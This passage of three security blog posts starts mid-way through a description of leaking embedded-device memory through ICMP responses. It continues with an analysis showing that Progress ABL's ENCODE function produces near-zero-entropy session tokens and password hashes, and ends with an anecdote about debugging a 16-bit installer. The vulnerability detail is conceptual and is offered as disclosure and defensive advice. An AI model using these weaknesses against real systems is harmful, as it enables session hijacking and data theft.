By manipulating the heap it is possible to rebuild large sections of the vulnerable devices memory based on the data segment of the returned ICMP responses. In many cases this will give the attacker everything they need to further compromise the system. Even when no critical encryption key or password exists in memory which can be leaked this attack is extremely useful in helping to facilitate a more typical heap corruption exploit.

I want to touch briefly on the steps that can be taken by device manufacturers to avoid this type of vulnerability. It is not sufficient to assume that because it is an embedded device it will not be attacked. As the popularity of deploying this type of system on the internet continues to grow greater numbers of attackers will focus on these platforms simply because exploitation is often easier. When deploying internet enabled devices the same precautions should be taken as with more conventional platforms like Windows and Linux. During the design process, base libraries and operating systems should be vetted through security review prior to inclusion in a product. I expect to see much more research into these platforms as ethernet adapters and wireless interfaces are added to more and more devices.


Crypto Pet Peeves: Hashing…Encoding…It’s All The Same, Right?

August 25, 2008

Patrick Toomey

© 2008 Neohapsis

We all know cryptography is hard. Time and time again we in the security community give advice that goes something like, “Unless you have an unbelievably good reason for developing your own cryptography, don’t!”. Even if you think you have an unbelievably good reason I would still take pause and make sure there is no other alternative. Nearly every aspect of cryptography is painstakingly difficult: developing new crypto primitives is hard, correctly implementing them is nearly just as hard, and even using existing crypto APIs can be fraught with subtlety. As discussed in a prior post, Seed Racing, even fairly simple random number generation is prone to developer error. Whenever I audit source I keep my eyes open for unfamiliar crypto code. So was the case on a recent engagement; I found myself reviewing an application in a language that I was less familiar with: Progress ABL.

Progress ABL is similar to a number of other 4GL languages, simplifying development given the proper problem set. Most notably, Progress ABL allows for rapid development of typical business CRUD applications, as the language has a number of features that make database interactions fairly transparent. For those of you interested to learn more, the language reference manual can be found on Progress’ website.

As I began my review of the application I found myself starting where I usually do: staring at the login page. The application was a fairly standard web app that required authentication via login credentials before accessing the sensitive components of the application. Being relatively unfamiliar with ABL, I was curious how they would handle session management. Sure enough, just as with many other web apps, the application set a secure cookie that uniquely identifies my session upon login. However, I noticed that the session ID was relatively short (sixteen lower/upper case letters and four digits). I decided to pull down a few thousand of the tokens to see if I noticed any anomalies. The first thing I noticed was that the four digit number on the end was obviously not random, as values tended to repeat, cluster together, etc. So, the security of the session ID must lie in the sixteen characters that precede the four digits. However, even the sixteen characters did not look so random. Certain letters appeared to occur more than others. Certain characters seemed to follow other characters more than others. But, this was totally unscientific; strange patterns can be found in any small sample of data. So, I decided to do a bit more scientific investigation into what was going on.

Just to confirm my suspicions I coded up a quick python script to pull down a few thousand tokens and count the frequency of each character in the token. Several minutes later I had a nice graph in excel.

Histogram of Encode Character Frequency
Histogram of Encode Character Frequency

Ouch! That sure doesn’t look very random. So, I opened up Burp Proxy and used their Sequencer to pull down a few thousand more session cookies. The Burp Sequencer has support for running a number of tests, including a set of FIPS-compliant statistical tests for randomness. To obtain a statistically significant result Burp analyzes a sample size of 20,000 tokens. Since I saw that the four digit token at the end of the session ID provided little to no entropy, I discarded them from the analysis. It seemed obvious that the sixteen character sequence was generated using some sort of cryptographic hash, and the four digit number was generated in some other way. I was more interested in the entropy provided by the hash. So, after twenty minutes of downloading tokens, I let Burp crunch the numbers. About 25 seconds later Burp returned an entropy value of 0 bits. Burp returned a graph that looked like the one below, showing the entropy of the data at various significance levels.

Encode Entropy Estimation
Encode Entropy Estimation

Hmmm, maybe Burp is broken. I was pretty sure I had successfully used the Burp Sequencer before. Maybe it was user error, a bug in the current version, who knows. I decided that a control was needed, just to ensure that the tool was working the way I thought it should. So, I wrote a bit more python to simply print the hex-encoded value of a SHA1 hash on the numbers 1-20,000. I loaded this data into Burp and analyzed the data set. Burp estimated the entropy at 153 bits. Just to compare with the prior results, here is the distribution graph and the Burp entropy results for the SHA1 output:

Histogram of SHA1 Character Frequency
Histogram of SHA1 Character Frequency

SHA1 Entropy Estimation
SHA1 Entropy Estimation

I repeated the same test against a set of JSESSIONID tokens and found a similarly acceptable result. Ok, so the Burp Sequencer seems to be working.

So, I next went hunting for the session token generation code in the application. After a little greping I found the function for generating new session tokens. Ultimately the function took a number of values and ran them through a function called “ENCODE”. Hmmm, ENCODE, that didn’t sound familiar. Some more greping through the source did not reveal any function definitions, so I assumed the function must be part of the standard library for ABL. Sure enough, on page 480 of the language reference manual there was a description of the ENCODE function.

“Encodes a source character string and returns the encoded character string result”

The documentation then goes on to state:

“The ENCODE function performs a one-way encoding operation that you cannot reverse.  It is useful for storing scrambled copies of passwords in a database. It is impossible to determine the original password by examining the database. However, a procedure can prompt a user for a password, encode it, and compare the result with the stored, encoded password to determine if the user supplied the correct password.”

That is the least committal description of a hash function I’ve ever had the pleasure reading. It turns out the application, as well as a third party library the application depends upon, uses this function for generating session tokens, storing passwords, and generating encryption keys. For the sake of reproducibility I wanted to be sure my data was not the result of some strange artifact in their environment. I installed the ABL runtime locally and coded up a simple ABL script to call ENCODE on the numbers 1-20000. I reran the Burp Sequencer and got the exact same result, 0 bits.

At this point I was fairly sure that ENCODE was flawed from a hashing perspective. A good quality secure hash function, regardless of how correlated the inputs are (as the number 1-20000 obviously would be), should produce output that is indistinguishable from truly random values (see Cryptographic Hash Functions and  Random Oracle Model for more information). ENCODE clearly does not meet this definition of a secure hash function. But, 0 bits, that seems almost inconceivably flawed.  So, giving them the benefit of the doubt, I wondered if the result is dependent on the input. In other words, I conjectured that ENCODE might perform some unsophisticated “scrambling” operation on the input, and thus input with low entropy will have low entropy on the output. Conversely, input with high entropy might retain it’s entropy on output. This still wouldn’t excuse the final result, but I was curious none the less. My final test was to use the output of my SHA1 results and feed them each through the ENCODE function. Since the output of the SHA1 function contains high entropy I conjectured that ENCODE, despite its obvious flaws, might retain this entropy. The results are shown below:

Histogram of SHA1 then Encode Character Frequency
Histogram of SHA1 then Encode Character Frequency

SHA1 then Encode Entropy Estimation
SHA1 then Encode Entropy Estimation

ENCODE manages to transform an input with approximately 160 bits of entropy into an output that, statistically speaking, contains 0 bits of entropy. In fact, the frequency distribution of the character output is nearly identical to the first graph in this post.

This brings me back to my opening statement, “Unless you have an unbelievably good reason for developing your own cryptography, don’t!”. I can’t figure out why this ENCODE function exists? Surely the ABL library has support for a proper hash function like SHA1, right? Yes, in fact it does. The best explanation I could come up with is that it is a legacy API call. If that is the case then the call should be deprecated and/or  documented as suitable only in cases where security is of no importance. The current API does the exact opposite, encouraging developers to use the function for storing passwords. Cryptography is hard, even for those of us that understand the subtlety involved. Anything that blurs the line between safe and unsafe behavior only makes the burden on developers even greater.

It is unclear, based on this analysis, how much effort it would require to find collisions in ABL’s ENCODE function. But, even this simple statistical analysis should be enough for anyone to steer clear of its use for anything security related. If you are an ABL developer I would recommend that you try replacing ENCODE with something else. As a trivial example, you could try: HEX-ENCODE(SHA1-DIGEST(input)). Obviously you need to test and refactor any code that this breaks. But, you can at least be assured that SHA1 is relatively secure from a hashing perspective. That said, you might want to start looking at SHA-256 or SHA-512, given the recent chinks in the armor of SHA1:

Unfortunately, it does not appear that ABL has support for these more contemporary SHA functions in their current release.

Ok….slowly stepping down off my soapbox now.   Bad crypto just happens to be one of my pet peeves.

Footnote:

Just before posting this blog entry I decided to email Progress to see if they were aware of the behavior of the ENCODE function.  After a bit a few back and forth emails I eventually got an email that desribed the ENCODE function as using a CRC-16 to generate it’s output (it is not the direct output, but CRC-16 is the basic primitive used to derive the output).  Unfortunately, CRCs were never meant to have any security gurantees.  CRCs do an excellent job of detecting accidental bit errors in a noisy transmission medium.  However, they provide no gurantees if a malicous user tries to find a collision.  In fact, maliciously generating inputs that produce identical CRC outputs is fairly trivial.  As an example, the linearity of the CRC-32 alogirthm was noted as problematic in an analysis of WEP.   Thus, despite the API doc recommendation, I would highly recommend that you not use ENCODE as a means of securely storing your user’s passwords.


16-bit debugger goodness

August 2, 2008

It’s Saturday around Noon.  A friend is building a new server and wants to add 8 gigs of RAM to his MSI mother board but needs to flash the motherboard.  I’m bored and seems easy plus he hasn’t seen Afro Samurai so I figure we’ll upgrade his motherboard watch some anime and it will be a Saturday afternoon well spent.

Well, turns out the instructions say use a floppy…guess what?  He has no floppy drives.  He has ten computers counting the laptop I brought but no floppy drives.  Ah ok,  well this is for a Linux server but we supposedly need windows to install.  He installed windows before I got there but no go.  The software won’t run and without a floppy, and we can’t make a DOS floppy.  Believe it our not I keep a small win98boot.img file on my server for just such a reason but without a floppy I’ve got nothing.

So I go back to my house where I have tons of computers, all with floppies.  Now that I think about it I have no idea why I always add a floppy when I build a machine… but I do.  Plus I have extra drives so I grab one and some blank disks.  Hey I still have blanks from the days of Slackware boot floppies, and Novell server.exes… yeah, you remember ;)

So get this, the mother board doesn’t boot with the floppy attached.  Whatever.  We figure it should be trivial to modify the installer to use another drive letter rather than A:.  We divided our efforts.  He goes to task making a USB DOS bootable thumbdrive and I go to modify the motherboard’s installer.

As you can probably guess from this post that it was a 16-bit installer.  No problem, right?  I do 32-bit in Olly and IDA so trivial eh?  Nope,  only IDA can open such a thing but it can’t run as a debugger.  Which wouldn’t be a big deal but the binary is packed.  Packed!  Yeah for real, 16-bit and packed.

At this stage there is no turning back for me.  Meanwhile he already has his thumbdrive in DOS mode.  But I can’t debug 16-bits even in IDA.  Huh, who knew?  Well probably a lot of you but I didn’t.  So I figure, well I start up debug.exe and do it from there…nope.  No breakpoint support or anything useful.  Hmmmm, well I stumble on GRDB.  It stands for ‘Get Real’ Debugger and I have to say I was impressed.  It can handle 16-bit apps as well as 32-bit functionality.  It actually has a lot of cool functionality like PCI bus support but I didn’t need that.  What it did have was breakpoints, single stepping and step over commands.  Plus in comments it would show if a jump was taken or the contents of ES:[ax+dx].  GRDB, I love you!  :)   And just for icing on the cake they have ANSI colors.  Now how can you not love that?

GRDB comes with source:  All in ASM and it can be compiled with MASM.  All code is licensed under the GPL as well!  Woot!  By now my friend has already updated his motherboard and is intalling Linux but I’m still in fascinated mode.  I missed the RE scene from back in the 16-bit DOS days.  Granted I used debug.exe to change binaries but it was based on offsets about which people had told me.  I was not in the scene that set the precedent for debuggers today.  Now to only modify the binary to support Ruby and a .gdbinit script… ;)

But if you are stuck with a 16-bit app I recommend GRDB, or if you want to write a packer that modern debuggers choke on…go old school.  (PS.  I laughed when I unpacked it and fired up ImpRec just to see NTVDM.EXE was all that was running :P )  I forget how spoiled I am nowadays but this Saturday afternoon I found a surprisingly useful gem.

–Craig